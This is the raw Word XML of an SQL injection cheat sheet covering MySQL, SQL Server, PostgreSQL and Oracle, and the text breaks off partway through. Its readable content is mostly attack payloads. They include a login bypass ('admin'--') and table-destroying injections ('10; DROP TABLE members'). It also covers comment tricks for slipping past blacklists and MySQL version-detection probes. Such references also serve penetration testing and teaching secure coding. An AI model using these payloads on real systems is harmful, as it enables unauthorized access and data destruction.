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EF3EA"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Some of the samples in this sheet might not work in every situation because real live environments may vary depending on the usage of parenthesis, different code bases and unexpected, strange and complex SQL sentences. </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br/>
        <w:t>Samples are provided to allow you to get basic idea of a potential attack and almost every section includes a brief information about itself.</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615"/>
        <w:gridCol w:w="8885"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B3493" w:rsidRPr="007B3493" w14:paraId="17AF8CDC" w14:textId="77777777" w:rsidTr="007B3493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75E0531D"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b/>
                <w:bCs/>
                <w:color w:val="696F72"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>M :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39E16A15"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color w:val="696F72"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3493" w:rsidRPr="007B3493" w14:paraId="34F821C4" w14:textId="77777777" w:rsidTr="007B3493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44BB969C"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b/>
                <w:bCs/>
                <w:color w:val="696F72"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>S :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B8DAB79"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color w:val="696F72"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3493" w:rsidRPr="007B3493" w14:paraId="0CD24472" w14:textId="77777777" w:rsidTr="007B3493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E3429C1"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b/>
                <w:bCs/>
                <w:color w:val="696F72"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>P :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2232AAE1"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color w:val="696F72"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3493" w:rsidRPr="007B3493" w14:paraId="2059349C" w14:textId="77777777" w:rsidTr="007B3493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7998808F"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b/>
                <w:bCs/>
                <w:color w:val="696F72"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>O :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A88E229"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color w:val="696F72"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3493" w:rsidRPr="007B3493" w14:paraId="111622B4" w14:textId="77777777" w:rsidTr="007B3493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="194405DD"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b/>
                <w:bCs/>
                <w:color w:val="696F72"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>+ :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61A1A3CF" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
            <w:pPr>
              <w:spacing w:after="300" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="696F72"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3493">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="696F72"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Possibly all other databases</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="193E1974" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Examples;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E63243E" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(MS) means : MySQL and SQL Server etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C726C10" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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(M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F664110"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0" w:name="TOC"/>
      <w:bookmarkStart w:id="1" w:name="LineComments"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Line Comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DACEB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lastRenderedPageBreak/>
        <w:t>Comments out rest of the query.</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Line comments are generally useful for ignoring rest of the query so you don't have to deal with fixing the syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75391C64" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(SM)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
        <w:t>DROP sampletable;-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B032755" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(M)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
        <w:t>DROP sampletable;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3308BD39" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="LineCommentAttacks"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Line Comments Sample SQL Injection Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71500946" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> admin'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2680ACE8" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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 FROM members WHERE username = 'admin'--' AND password = 'password' </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>This is going to log you as admin user, because rest of the SQL query will be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3175F81B"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3" w:name="InlineComments"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Inline Comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BBE3A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t>Comments out rest of the query by not closing them</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> or you can use for </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>bypassing blacklisting</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, removing spaces, obfuscating and determining database versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641927DA" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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/*Comment Here*/</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (SM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341ABA27" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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DROP/*comment*/sampletable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0064297D" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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DR/**/OP/*bypass blacklisting*/sampletable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D98402F" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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SELECT/*avoid-spaces*/password/**/FROM/**/Members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E2FF26" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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MYSQL Special SQL *</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>/ (M) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>This is a special comment syntax for MySQL. It's perfect for detecting MySQL version. If you put a code into this comments it's going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version. </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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>SELECT /*!</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>32302</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> 1/0, */ 1 FROM tablename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4363463F" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="InlineSamples"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Classical Inline Comment SQL Injection Attack Samples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528AB906" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ID: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>10; DROP TABLE members /*</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Simply get rid of other stuff at the end the of query. Same as </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>10; DROP TABLE members --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE908BA" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>32302</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> 1/0, */ 1 FROM tablename</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Will throw an </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>divison by 0 error </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>if MySQL version is higher than</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>3.23.02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D00907A" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="MySQLInlineSamples"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>MySQL Version Detection Sample Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B3680B" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ID: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
